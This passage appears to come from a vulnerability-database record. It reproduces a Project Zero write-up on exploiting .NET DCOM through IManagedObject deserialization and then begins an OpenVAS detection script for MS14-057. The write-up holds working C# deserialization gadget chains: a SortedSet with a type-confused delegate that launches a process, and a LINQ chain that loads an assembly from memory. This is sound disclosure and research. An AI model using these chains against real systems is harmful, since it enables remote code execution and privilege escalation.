[Process.Start](<https://msdn.microsoft.com/en-us/library/h6ak8zt5\\(v=vs.110\\).aspx>) method which you could call to escape the sandbox. If you want more details about that you can look at the PoC I wrote and put up on [Github](<https://github.com/tyranid/IE11SandboxEscapes/blob/master/CVE-2014-0257/CVE-2014-0257.cpp>). Microsoft fixed this by preventing the access to the reflection APIs over DCOM.\n\n** \n**\n\nThe second issue was more subtle and is a byproduct of a feature of .NET interop which presumably no-one realized would be a security liability. Loading the .NET runtime requires quite a lot of additional resources, therefore the default for a native COM client calling methods on a .NET COM server is to let COM and the CCW manage the communication, even if this is a performance hit. Microsoft could have chosen to use the COM marshaler to force .NET to be loaded in the client but this seems overzealous, not even counting the possibility that the client might not even have a compatible version of .NET installed.\n\n** \n**\n\nWhen .NET interops with a COM object it creates the inverse of the CCW, the [Runtime Callable Wrapper](<https://msdn.microsoft.com/en-us/library/8bwh56xe\\(v=vs.110\\).aspx>) (RCW). This is a .NET object which implements a runtime version of the COM interface and marshals it to the COM object. Now it\u2019s entirely possible that the COM object is actually written in .NET, it might even be in the same [Application Domain](<https://msdn.microsoft.com/en-us/library/2bh4z9hs\\(v=vs.110\\).aspx>). If .NET didn\u2019t do something you could end up with a double performance hit, marshaling in the RCW to call a COM object which is actually a CCW to a managed object. \n\n** \n**\n\n\n\n** \n** \n\n\nIt would be nice to try and \u201cunwrap\u201d the managed object from the CCW and get back a real .NET object. This is where the villain in this piece comes into play, the [IManagedObject](<https://msdn.microsoft.com/en-us/library/cc233673.aspx>) interface, which looks like the following:\n\n** \n**\n\nstruct IManagedObject : public IUnknown { \nHRESULT GetObjectIdentity( \nBSTR* pBSTRGUID, \nint* AppDomainID, \nint* pCCW); \n \nHRESULT GetSerializedBuffer( \nBSTR *pBSTR \n); \n};\n\n** \n**\n\nWhen the .NET runtime gets hold of a COM object it will go through a process to determine whether it can \u201cunwrap\u201d the object from its CCW and avoid creating an RCW. This process is [documented](<https://msdn.microsoft.com/en-us/library/cc233722.aspx>) but in summary the runtime will do the following: \n\n\n 1. Call QueryInterface on the COM object to determine if it implements the IManagedObject interface. If not then return an appropriate RCW.\n\n 2. Call GetObjectIdentity on the interface. If the GUID matches the per-runtime GUID (generated at runtime startup) and the AppDomain ID matches the current AppDomain ID then lookup the CCW value in a runtime table and extract a pointer to the real managed object and return it.\n\n 3. Call GetSerializedBuffer on the interface. The runtime will check if the .NET object is serializable, if so it will pass the object to [BinaryFormatter::Serialize](<https://msdn.microsoft.com/en-us/library/c5sbs8z9\\(v=vs.110\\).aspx>) and package the result in a Binary String (BSTR). This will be returned to the client which will now attempt to deserialize the buffer to an object instance by calling [BinaryFormatter::Deserialize](<https://msdn.microsoft.com/en-us/library/b85344hz\\(v=vs.110\\).aspx>). \n\n** \n**\n\nBoth steps 2 and 3 sound like a bad idea. For example while in 2 the per-runtime GUID can\u2019t be guessed; if you have access to any other object in the same process (such as the COM object exposed by the server itself) you can call GetObjectIdentity on the object and replay the GUID and AppDomain ID back to the server. This doesn\u2019t really gain you much though, the CCW value is just a number not a pointer so at best you\u2019ll be able to extract objects which already have a CCW in place.\n\n** \n**\n\nInstead it\u2019s step 3 which is really nasty. Arbitrary deserialization is dangerous almost no matter what language (take your pick, [Java](<https://www.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class>), [PHP](<https://www.owasp.org/index.php/PHP_Object_Injection>), [Ruby](<https://www.rapid7.com/db/modules/exploit/multi/http/rails_xml_yaml_code_exec>) etc.) and .NET is no different. In fact my first ever Blackhat USA [presentation](<https://www.youtube.com/watch?v=Xfbu-pQ1tIc>) ([whitepaper](<https://www.contextis.com/documents/1/are_you_my_type.pdf>)) was on this very topic and there\u2019s been follow up work since (such as [this blog post](<https://blog.scrt.ch/2016/05/12/net-serialiception/>)). Clearly this is an issue we can exploit, first let\u2019s look at it from the perspective of privilege escalation.\n\n## Elevating Privileges\n\nHow can we get a COM server written in .NET to do the arbitrary deserialization? We need the server to try and create an RCW for a serializable .NET object exposed over COM. It would be nice if this could also been done generically; it just so happens that on the standard _Object interface there exists a function we can pass an arbitrary object to, the Equals method. The purpose of Equals is to compare two objects for equality. If we pass a .NET COM object to the server\u2019s Equals method the runtime must try and convert it to an RCW so that the managed implementation can use it. At this point the runtime wants to be helpful and checks if it\u2019s really a CCW wrapped .NET object. The server runtime calls GetSerializedBuffer which results in arbitrary deserialization in the server process.\n\n** \n**\n\nThis is how I exploited the ClickOnce Deployment broker a second time resulting in [CVE-2014-4073](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4073>). The trick to exploiting this was to send a serialized [Hashtable](<https://msdn.microsoft.com/en-us/library/system.collections.hashtable\\(v=vs.110\\).aspx>) to the server which contains a COM implementation of the [IHashCodeProvider](<https://msdn.microsoft.com/en-us/library/system.collections.ihashcodeprovider\\(v=vs.110\\).aspx>) interface. When the Hashtable runs its custom deserialization code it needs to rebuild its internal hash structures, it does that by calling [IHashCodeProvider::GetHashCode](<https://msdn.microsoft.com/en-us/library/system.collections.ihashcodeprovider.gethashcode\\(v=vs.110\\).aspx>) on each key. By adding a [Delegate](<https://msdn.microsoft.com/en-us/library/system.delegate\\(v=vs.110\\).aspx>) object, which is serializable, as one of the keys we\u2019ll get it passed back to the client. By writing the client in native code the automatic serialization through IManagedObject won\u2019t occur when passing the delegate back to us. The delegate object gets stuck inside the server process but the CCW is exposed to us which we can call. Invoking the delegate results in the specified function being executed in the server context which allows us to start a new process with the server\u2019s privileges. As this works generically I even wrote a tool to do it for any .NET COM server which you can [find on github](<https://github.com/tyranid/ExploitDotNetDCOM/tree/master/ExploitDotNetDCOMSerializer>).\n\n** \n**\n\n\n\n** \n**\n\nMicrosoft could have fixed CVE-2014-4073 by changing the behavior of IManagedObject::GetSerializedBuffer but they didn\u2019t. Instead Microsoft rewrote the broker in native code instead. Also a blog post was published warning developers of the [dangers of .NET DCOM](<https://blogs.technet.microsoft.com/srd/2014/10/14/more-details-about-cve-2014-4073-elevation-of-privilege-vulnerability/>). However what they didn\u2019t do is deprecate any of the APIs to register DCOM objects in .NET so unless a developer is particularly security savvy and happens to read a Microsoft security blog they probably don\u2019t realize it\u2019s a problem. \n\n** \n**\n\nThis bug class exists to this day, for example when I recently received a new work laptop I did what I always do, enumerate what OEM \u201cvalue add\u201d software has been installed and see if anything was exploitable. It turns out that as part of the audio driver package was installed a COM service written by Dolby. After a couple of minutes of inspection, basically enumerating accessible interface for the COM server, I discovered it was written in .NET (the presence of IManagedObject is always a big giveaway). I cracked out my exploitation tool and in less than 5 minutes I had code execution at local system. This has now been fixed as CVE-2017-7293, you can find the very terse writeup [here](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1075>). Once again as .NET DCOM is fundamentally unsafe the only thing Dolby could do was rewrite the service in native code.\n\n## Hacking the Caller\n\nFinding a new instance of the IManagedObject bug class focussed my mind on its other implications. The first thing to stress is the server itself isn\u2019t vulnerable, instead it\u2019s only when we can force the server to act as a DCOM client calling back to the attacking application that the vulnerability can be exploited. Any .NET application which calls a DCOM object through managed COM interop should have a similar issue, not just servers. Is there likely to be any common use case for DCOM, especially in a modern Enterprise environment?\n\n** \n**\n\nMy immediate thought was Windows Management Instrumentation (WMI). Modern versions of Windows can connect to remote WMI instances using the WS-Management (WSMAN) protocol but for legacy reasons WMI still supports a DCOM transport. One use case for WMI is to scan enterprise machines for potentially malicious behavior. One of the reasons for this resurgence is Powershell (which is implemented in .NET) having easy to use support for WMI. Perhaps PS or .NET itself will be vulnerable to this attack if they try and access a compromised workstation in the network?\n\n** \n**\n\n\n\n** \n**\n\nLooking at MSDN, .NET supports WMI through the [System.Management](<https://msdn.microsoft.com/en-us/library/system.management\\(v=vs.110\\).aspx>) namespace. This has existed since the beginning of .NET. It supports remote access to WMI and considering the age of the classes it predates WSMAN and so almost certainly uses DCOM under the hood. On the PS front there\u2019s support for WMI through cmdlets such as [Get-WmiObject](<https://technet.microsoft.com/en-us/library/ee176860.aspx>). PS version 3 (introduced in Windows 8 and Server 2008) added a new set of cmdlets including [Get-CimInstance](<https://technet.microsoft.com/en-us/itpro/powershell/windows/cimcmdlets/get-ciminstance>). Reading the related link it\u2019s clear why the CIM cmdlets were introduced, support for WSMAN, and the link explicitly points out that the \u201cold\u201d WMI cmdlets uses DCOM. \n\n** \n**\n\n\n\n** \n**\n\nAt this point we could jump straight into RE of the .NET and PS class libraries, but there\u2019s an easier way. It\u2019s likely we\u2019d be able to see whether the .NET client queries for IManagedObject by observing the DCOM RPC traffic to a WMI server. Wireshark already has a DCOM dissector saving us a lot of trouble. For a test I set up two VMs, one with Windows Server 2016 acting as a domain controller and one with Windows 10 as a client on the domain. Then from a Domain Administrator on the client I issued a simple WMI PS command \u2018Get-WmiObject Win32_Process -ComputerName dc.network.local\u2019 while monitoring the network using Wireshark. The following image shows what I observed:\n\n** \n**\n\n\n\n** \n**\n\nThe screenshot shows the initial creation request for the WMI DCOM object on the DC server (192.168.56.50) from the PS client (192.168.56.102). We can see it\u2019s querying for the IWbemLoginClientID interface which is the part of the initialization process (as documented in [MS-WMI](<https://msdn.microsoft.com/en-us/library/dd208060.aspx>)). The client then tries to request a few other interfaces; notably it asks for IManagedObject. This almost certainly indicates that a client using the PS WMI cmdlets would be vulnerable.\n\n** \n**\n\nIn order to test whether this is really a vulnerability we\u2019ll need a fake WMI server. This would seem like it would be quite a challenge, but all we need to do is modify the registration for the winmgmt service to point to our fake implementation. As long as that service then registers a COM class with the CLSID {8BC3F05E-D86B-11D0-A075-00C04FB68820} the COM activator will start the service and serve any client an instance of our fake WMI object. If we look back at our network capture it turns out that the query for IManagedObject isn\u2019t occurring on the main class, but instead on the IWbemServices object returned from [IWbemLevel1Login::NTLMLogin](<https://msdn.microsoft.com/en-us/library/cc250759.aspx>). But that\u2019s okay, it just adds a bit extra boilerplate code. To ensure it\u2019s working we\u2019ll implement the following code which will tell the deserialization code to look for an unknown Assembly called Badgers.\n\n** \n**\n\n[Serializable, ComVisible(true)] \npublic class FakeWbemServices : \nIWbemServices, \nISerializable { \npublic void GetObjectData(SerializationInfo info, \nStreamingContext context) { \ninfo.AssemblyName = \"Badgers, Version=4.0.0.0\"; \ninfo.FullTypeName = \"System.Badgers.Test\"; \n} \n \n// Rest of fake implementation... \n}\n\n** \n**\n\nIf we successfully injected a serialized stream then we\u2019d expect the PS process to try and lookup a Badgers.dll file and using Process Monitor that\u2019s exactly what we find.\n\n** \n**\n\n\n\n## Chaining Up the Deserializer\n\nWhen exploiting the deserialization for local privilege escalation we can be sure that we can connect back to the server and run an arbitrary delegate. We don\u2019t have any such guarantees in the RCE case. If the WMI client has default Windows Firewall rules enabled then we almost certainly wouldn\u2019t be able to connect to the RPC endpoint made by the delegate object. We also need to be allowed to login over the network to the machine running the WMI client, our compromised machine might not have a login to the domain or the enterprise policy might block anyone but the owner from logging in to the client machine.\n\n** \n**\n\nWe therefore need a slightly different plan, instead of actively attacking the client through exposing a new delegate object we\u2019ll instead pass it a byte stream which when deserialized executes a desired action. In an ideal world we\u2019d find that one serializable class which just executes arbitrary code for us. Sadly (as far as I know of) no such class exists. So instead we\u2019ll need to find a series of \u201cGadget\u201d classes which when chained together perform the desired effect. \n\n** \n**\n\nSo in this situation I tend to write some quick analysis tools, .NET supports a pretty good Reflection API so finding basic information such as whether a class is serializable or which interfaces a class supports is pretty easy to do. We also need a list of Assemblies to check, the quickest way I know of is to use the [gacutil utility](<https://msdn.microsoft.com/en-us/library/ex0ss12c%28v=vs.110%29.aspx>) installed as part of the .NET SDK (and so installed with Visual Studio). Run the command gacutil /l > assemblies.txt to create a list of assembly names you can load and process. For a first pass we\u2019ll look for any classes which are serializable and have delegates in them, these might be classes which when an operation is performed will execute arbitrary code. With our list of assemblies we can write some simple code like the following to find those classes, just call FindSerializableTypes for each assembly name string:\n\n** \n**\n\nstatic bool IsDelegateType(Type t) { \nreturn typeof(Delegate).IsAssignableFrom(t); \n} \n \nstatic bool HasSerializedDelegate(Type t) { \n// Custom serialized objects rarely serialize their delegates. \nif (typeof(ISerializable).IsAssignableFrom(t)) { \nreturn false; \n} \n \nforeach (FieldInfo field in FormatterServices.GetSerializableMembers(t)) { \nif (IsDelegateType(field.FieldType)) { \nreturn true; \n} \n} \n} \n \nstatic void FindSerializableTypes(string assembly_name) { \nAssembly asm = Assembly.Load(assembly_name); \nvar types = asm.GetTypes().Where(t => t.IsSerializable \n&& t.IsClass \n&& !t.IsAbstract \n&& !IsDelegateType(t) \n&& HasSerializedDelegate(t)); \nforeach (Type type in types) { \nConsole.WriteLine(type.FullName); \n} \n}\n\n** \n**\n\nAcross my system this analysis only resulted in around 20 classes, and of those many were actually in the F# libraries which are not distributed in a default installation. However one class did catch my eye, System.Collections.Generic.ComparisonComparer<T>. You can find the implementation in the [reference source](<https://github.com/Microsoft/referencesource/blob/90b323fe52bec428fe4bd5f007e9ead6b265d553/mscorlib/system/collections/generic/comparer.cs#L157>), but as it\u2019s so simple here it is in its entirety:\n\n** \n**\n\npublic delegate int Comparison<T>(T x, T y);\n\n** \n**\n\n[Serializable] \ninternal class ComparisonComparer<T> : Comparer<T> { \nprivate readonly Comparison<T> _comparison; \n \npublic ComparisonComparer(Comparison<T> comparison) { \n_comparison = comparison; \n} \n \npublic override int Compare(T x, T y) { \nreturn this._comparison(x, y); \n} \n}\n\n** \n**\n\nThis class wraps a Comparison<T> delegate which takes two generic parameters (of the same type) and returns an integer, calling the delegate to implement the [IComparer<T>](<https://msdn.microsoft.com/en-us/library/8ehhxeaf%28v=vs.110%29.aspx>) interface. While the class is internal its creation is exposed through [Comparer<T>::Create](<https://msdn.microsoft.com/en-us/library/hh737198%28v=vs.110%29.aspx>) static method. This is the first part of the chain, with this class and a bit of massaging of serialized delegates we can chain [IComparer<T>::Compare](<https://msdn.microsoft.com/en-us/library/bb346115%28v=vs.110%29.aspx>) to Process::Start and get an arbitrary process created. Now we need the next part of the chain, calling this comparer object with arbitrary arguments.\n\n** \n**\n\nComparer objects are used a lot in the generic .NET collection classes and many of these collection classes also have custom deserialization code. In this case we can abuse the [SortedSet<T>](<https://msdn.microsoft.com/en-us/library/dd412070\\(v=vs.110\\).aspx>) class, on deserialization it rebuilds its set using an internal comparer object to determine the sort order. The values passed to the comparer are the entries in the set, which is under our complete control. Let\u2019s write some test code to check it works as we expect:\n\n** \n**\n\nstatic void TypeConfuseDelegate(Comparison<string> comp) { \nFieldInfo fi = typeof(MulticastDelegate).GetField(\"_invocationList\", \nBindingFlags.NonPublic | BindingFlags.Instance); \nobject[] invoke_list = comp.GetInvocationList(); \n// Modify the invocation list to add Process::Start(string, string) \ninvoke_list[1] = new Func<string, string, Process>(Process.Start); \nfi.SetValue(comp, invoke_list); \n} \n \n// Create a simple multicast delegate. \nDelegate d = new Comparison<string>(String.Compare); \nComparison<string> d = (Comparison<string>) MulticastDelegate.Combine(d, d); \n\n\n// Create set with original comparer. \nIComparer<string> comp = Comparer<string>.Create(d); \nSortedSet<string> set = new SortedSet<string>(comp); \n \n// Setup values to call calc.exe with a dummy argument. \nset.Add(\"calc\"); \nset.Add(\"adummy\"); \n \nTypeConfuseDelegate(d); \n \n// Test serialization. \nBinaryFormatter fmt = new BinaryFormatter(); \nMemoryStream stm = new MemoryStream(); \nfmt.Serialize(stm, set); \nstm.Position = 0; \nfmt.Deserialize(stm);\n\n// Calculator should execute during Deserialize.\n\n** \n**\n\nThe only weird thing about this code is TypeConfuseDelegate. It\u2019s a long standing issue that .NET delegates don\u2019t always enforce their type signature, especially the return value. In this case we create a two entry multicast delegate (a delegate which will run multiple single delegates sequentially), setting one delegate to String::Compare which returns an int, and another to Process::Start which returns an instance of the Process class. This works, even when deserialized and invokes the two separate methods. It will then return the created process object as an integer, which just means it will return the pointer to the instance of the process object. So we end up with chain which looks like the following:\n\n** \n**\n\n\n\n** \n**\n\nWhile this is a pretty simple chain it has a couple of problems which makes it less than ideal for our use: \n\n\n 1. The Comparer<T>::Create method and the corresponding class were only introduced in .NET 4.5, which covers Windows 8 and above but not Windows 7.\n\n 2. The exploit relies in part on a type confusion of the return value of the delegate. While it\u2019s only converting the Process object to an integer this is somewhat less than ideal and could have unexpected side effects.\n\n 3. Starting a process is a bit on the noisy side, it would be nicer to load our code from memory.\n\n** \n**\n\nSo we\u2019ll need to find something better. We want something which works at a minimum on .NET 3.5, which would be the version on Windows 7 which Windows Update would automatically update you to. Also it shouldn\u2019t rely on undefined behaviour or loading our code from outside of the DCOM channel such as over a HTTP connection. Sounds like a challenge to me.\n\n## Improving the Chain\n\nWhile looking at some of the other classes which are serializable I noticed a few in the [System.Workflow.ComponentModel.Serialization](<https://msdn.microsoft.com/en-us/library/system.workflow.componentmodel.serialization\\(v=vs.110\\).aspx>) namespace. This namespace contains classes which are part of the [Windows Workflow Foundation](<https://msdn.microsoft.com/en-us/library/jj684582.aspx>), which is a set of libraries to build execution pipelines to perform a series of tasks. This alone sounds interesting, and it turns out I have exploited the core functionality before as a bypass for [Code Integrity in Windows Powershell](<http://www.exploit-monday.com/2013/07/WinRT-ARM-Shellcode.html?showComment=1376669197806#c4072135924776553338>).\n\n** \n**\n\nThis lead me to finding the [ObjectSerializedRef](<https://github.com/Microsoft/referencesource/blob/4fe4349175f4c5091d972a7e56ea12012f1e7170/System.Workflow.ComponentModel/AuthoringOM/Serializer/ActivitySurrogateSelector.cs#L135>) class. This looks very much like a class which will deserialize any object type, not just serialized ones. If this was the case then that would be a very powerful primitive for building a more functional deserialization chain. \n\n** \n**\n\n[Serializable] \nprivate sealed class ObjectSerializedRef : IObjectReference,\n\nIDeserializationCallback \n{ \nprivate Type type; \nprivate object[] memberDatas; \n \n[NonSerialized] \nprivate object returnedObject; \n \nobject IObjectReference.GetRealObject(StreamingContext context) { \nreturnedObject = FormatterServices.GetUninitializedObject(type); \nreturn this.returnedObject; \n} \n \nvoid IDeserializationCallback.OnDeserialization(object sender) { \nstring[] array = null; \nMemberInfo[] serializableMembers = \nFormatterServicesNoSerializableCheck.GetSerializableMembers(\n\ntype, out array); \nFormatterServices.PopulateObjectMembers(returnedObject,\n\nserializableMembers, memberDatas); \n} \n}\n\n** \n**\n\nLooking at the implementation the class was used as a serialization surrogate exposed through the [ActivitiySurrogateSelector](<https://msdn.microsoft.com/en-us/library/system.workflow.componentmodel.serialization.activitysurrogateselector%28v=vs.110%29.aspx>) class. This is a feature of the .NET serialization API, you can specify a \u201cSurrogate Selector\u201d during the serialization process which will replace an object with surrogate class. When the stream is deserialized this surrogate class contains enough information to reconstruct the original object. One use case is to handle the serialization of non-serializable classes, but ObjectSerializedRef goes beyond a specific use case and allows you to deserialize anything. A test was in order:\n\n** \n**\n\n// Definitely non-serializable class. \nclass NonSerializable { \nprivate string _text; \n \npublic NonSerializable(string text) { \n_text = text; \n} \n \npublic override string ToString() { \nreturn _text; \n} \n} \n \n// Custom serialization surrogate \nclass MySurrogateSelector : SurrogateSelector { \npublic override ISerializationSurrogate GetSurrogate(Type type, \nStreamingContext context, out ISurrogateSelector selector) { \nselector = this; \nif (!type.IsSerializable) { \nType t = Type.GetType(\"ActivitySurrogateSelector+ObjectSurrogate\"); \nreturn (ISerializationSurrogate)Activator.CreateInstance(t); \n} \n \nreturn base.GetSurrogate(type, context, out selector); \n} \n} \n \nstatic void TestObjectSerializedRef() { \nBinaryFormatter fmt = new BinaryFormatter(); \nMemoryStream stm = new MemoryStream(); \nfmt.SurrogateSelector = new MySurrogateSelector(); \nfmt.Serialize(stm, new NonSerializable(\"Hello World!\")); \nstm.Position = 0; \n \n// Should print Hello World!. \nConsole.WriteLine(fmt.Deserialize(stm)); \n}\n\n** \n**\n\nThe ObjectSurrogate class seems to work almost too well. This class totally destroys any hope of securing an untrusted BinaryFormatter stream and it\u2019s available from .NET 3.0. Any class which didn\u2019t mark itself as serializable is now a target. It\u2019s going to be pretty easy to find a class which while invoke an arbitrary delegate during deserialization as the developer will not be doing anything to guard against such an attack vector. \n\n** \n**\n\nNow just to choose a target to build out our deserialization chain. I could have chosen to poke further at the Workflow classes, but the API is horrible (in fact in .NET 4 Microsoft replaced the old APIs with a new, slightly nicer one). Instead I\u2019ll pick a really easy to use target, Language Integrated Query (LINQ).\n\n** \n**\n\nLINQ was introduced in .NET 3.5 as a core language feature. A new SQL-like syntax was introduced to the C# and VB compilers to perform queries across enumerable objects, such as Lists or Dictionaries. An example of the syntax which filters a list of names based on length and returns the list uppercased is as follows:\n\n** \n**\n\nstring[] names = { \"Alice\", \"Bob\", \"Carl\" }; \n \nIEnumerable<string> query = from name in names \nwhere name.Length > 3 \norderby name \nselect name.ToUpper(); \n \nforeach (string item in query) { \nConsole.WriteLine(item); \n}\n\n** \n**\n\nYou can also view LINQ not as a query syntax but instead a way of doing list comprehension in .NET. If you think of \u2018select\u2019 as equivalent to \u2018map\u2019 and \u2018where\u2019 to \u2018filter\u2019 it might make more sense. Underneath the query syntax is a series of methods implemented in the [System.Linq.Enumerable](<https://msdn.microsoft.com/en-us/library/system.linq.enumerable\\(v=vs.110\\).aspx>) class. You can write it using normal C# syntax instead of the query language; if you do the previous example becomes the following:\n\n** \n**\n\nIEnumerable<string> query = names.Where(name => name.Length > 3) \n.OrderBy(name => name) \n.Select(name => name.ToUpper());\n\n** \n**\n\nThe methods such as Where take two parameters, a list object (this is hidden in the above example) and a delegate to invoke for each entry in the enumerable list. The delegate is typically provided by the application, however there\u2019s nothing to stop you replacing the delegates with system methods. The important thing to bear in mind is that the delegates are not invoked until the list is enumerated. This means we can build an enumerable list using LINQ methods, serialize it using the ObjectSurrogate (LINQ classes are not themselves serializable) then if we can force the deserialized list to be enumerated it will execute arbitrary code.\n\n** \n**\n\nUsing LINQ as a primitive we can create a list which when enumerated maps a byte array to an instance of a type in that byte array by the following sequence:\n\n** \n**\n\n\n\nThe only tricky part is step 2, we\u2019d like to extract a specific type but our only real option is to use the [Enumerable.Join](<https://msdn.microsoft.com/en-us/library/system.linq.enumerable.join%28v=vs.110%29.aspx>) method which requires some weird kludges to get it to work. A better option would have been to use [Enumerable.Zip](<https://msdn.microsoft.com/en-us/library/dd267698%28v=vs.110%29.aspx>) but that was only introduced in .NET 4. So instead we\u2019ll just get all the types in the loaded assembly and create them all, if we just have one type then this isn\u2019t going to make any difference. How does the implementation look in C#?\n\n** \n**\n\nstatic IEnumerable CreateLinq(byte[] assembly) { \nList<byte[]> base_list = new List<byte[]>(); \nbase_list.Add(assembly); \n \nvar get_types_del = (Func<Assembly, IEnumerable<Type>>)\n\nDelegate.CreateDelegate( \ntypeof(Func<Assembly, IEnumerable<Type>>), \ntypeof(Assembly).GetMethod(\"GetTypes\")); \n \nreturn base_list.Select(Assembly.Load) \n.SelectMany(get_types_del) \n.Select(Activator.CreateInstance); \n}\n\n** \n**\n\nThe only non-obvious part of the C# implementation is the delegate for Assembly::GetTypes. What we need is a delegate which takes an Assembly object and returns a list of Type objects. However as GetTypes is an instance method the default would be to capture the Assembly class and store it inside the delegate object, which would result in a delegate which took no parameters and returned a list of Type. We can get around this by using the reflection APIs to create an open delegate to an instance member. An open delegate doesn\u2019t store the object instance, instead it exposes it as an additional Assembly parameter, exactly what we want.\n\n** \n**\n\nWith our enumerable list we can get the assembly loaded and our own code executed, but how do we get the list enumerated to start the chain? For this decided I\u2019d try and find a class which when calling ToString (a pretty common method) would enumerate the list. This is easy in Java, almost all the collection classes have this exact behavior. Sadly it seems .NET doesn't follow Java in this respect. So I modified my analysis tools to try and hunt for gadgets which would get us there. To cut a long story short I found a chain from ToString to IEnumerable through three separate classes. The chain looks something like the following:\n\n** \n**\n\n\n\nAre we done yet? No, just one more step, we need to call ToString on an arbitrary object during deserialization. Of course I wouldn\u2019t have chosen ToString if I didn\u2019t already have a method to do this. In this final case I\u2019ll go back to abusing poor, old, Hashtable. During deserialization of the Hashtable class it will rebuild its key set, which we already know about as this is how I exploited serialization for local EoP. If two keys are equal then the deserialization will fail with the Hashtable throwing an exception, resulting in running the [following code](<https://github.com/Microsoft/referencesource/blob/4fe4349175f4c5091d972a7e56ea12012f1e7170/mscorlib/system/collections/hashtable.cs#L959>):\n\n** \n**\n\nthrow new ArgumentException( \nEnvironment.GetResourceString(\"Argument_AddingDuplicate__\", \nbuckets[bucketNumber].key, key));\n\n** \n**\n\nIt\u2019s not immediately obvious why this would be useful. But perhaps looking at the implementation of [GetResourceString](<https://github.com/Microsoft/referencesource/blob/4fe4349175f4c5091d972a7e56ea12012f1e7170/mscorlib/system/environment.cs#L1331>) will make it clearer:\n\n** \n**\n\ninternal static String GetResourceString(String key, params Object[] values) { \nString s = GetResourceString(key); \nreturn String.Format(CultureInfo.CurrentCulture, s, values); \n}\n\n** \n**\n\nThe key is passed to GetResourceString within the values array as well as a reference to a resource string. The resource string is looked up and along with the key passed to String.Format. The resulting resource string has formatting codes so when String.Format encounters the non-string value it calls ToString on the object to format it. This results in ToString being called during deserialization kicking off the chain of events which leads to us loading an arbitrary .NET assembly from memory and executing code in the context of the WMI client. \n\n** \n**\n\n\n\nYou can see the final implementation in latest the PoC I\u2019ve added to the [issue tracker](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1081#c5>).\n\n## Conclusions\n\nMicrosoft fixed the RCE issue by ensuring that the System.Management classes never directly creates an RCW for a WMI object. However this fix doesn\u2019t affect any other use of DCOM in .NET, so privileged .NET DCOM servers are still vulnerable and other remote DCOM applications could also be attacked.\n\n** \n**\n\nAlso this should be a lesson to never deserialize untrusted data using the .NET BinaryFormatter class. It\u2019s a dangerous thing to do at the best of times, but it seems that the developers have abandoned any hope of making secure serializable classes. The presence of ObjectSurrogate effectively means that every class in the runtime is serializable, whether the original developer wanted them to be or not.\n\n \nAnd as a final thought you should always be skeptical about the security implementation of middleware especially if you can\u2019t inspect what it does. The fact that the issue with IManagedObject is designed in and hard to remove makes it very difficult to fix correctly.\n", "modified": "2017-04-28T00:00:00", "published": "2017-04-28T00:00:00", "id": "GOOGLEPROJECTZERO:6D438BFA912DDE0EA057833C8B12B7AD", "href": "https://googleprojectzero.blogspot.com/2017/04/exploiting-net-managed-dcom.html", "type": "googleprojectzero", "title": "\nExploiting .NET Managed DCOM\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-06-10T19:52:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4073", "CVE-2014-4122", "CVE-2014-4121"], "description": "This host is missing an critical security\n update according to Microsoft Bulletin MS14-057.", "modified": "2020-06-09T00:00:00", "published": "2014-10-15T00:00:00", "id": "OPENVAS:1361412562310804777", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804777", "type": "openvas", "title": "Microsoft .NET Framework Remote Code Execution Vulnerability (3000414)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft .NET Framework Remote Code Execution Vulnerability (3000414)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804777\");\n script_version(\"2020-06-09T08:59:39+0000\");\n script_cve_id(\"CVE-2014-4073\", \"CVE-2014-4121\", \"CVE-2014-4122\");\n script_bugtraq_id(70313, 70351, 70312);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 08:59:39 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-10-15 11:15:20 +0530 (Wed, 15 Oct 2014)\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Microsoft .NET Framework Remote Code Execution Vulnerability (3000414)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an critical security\n update according to Microsoft Bulletin MS14-057.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An unspecified error related to .NET ClickOnce.\n\n - An unspecified error when handling internationalized resource identifiers.\n\n - An unspecified error.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to bypass certain security restrictions and compromise a\n vulnerable system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 2.0, 3.5, 3.5.1, 4.0, 4.5, 4.5.1 and 4.5.2.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/kb/3000414\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/ms14-057\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n 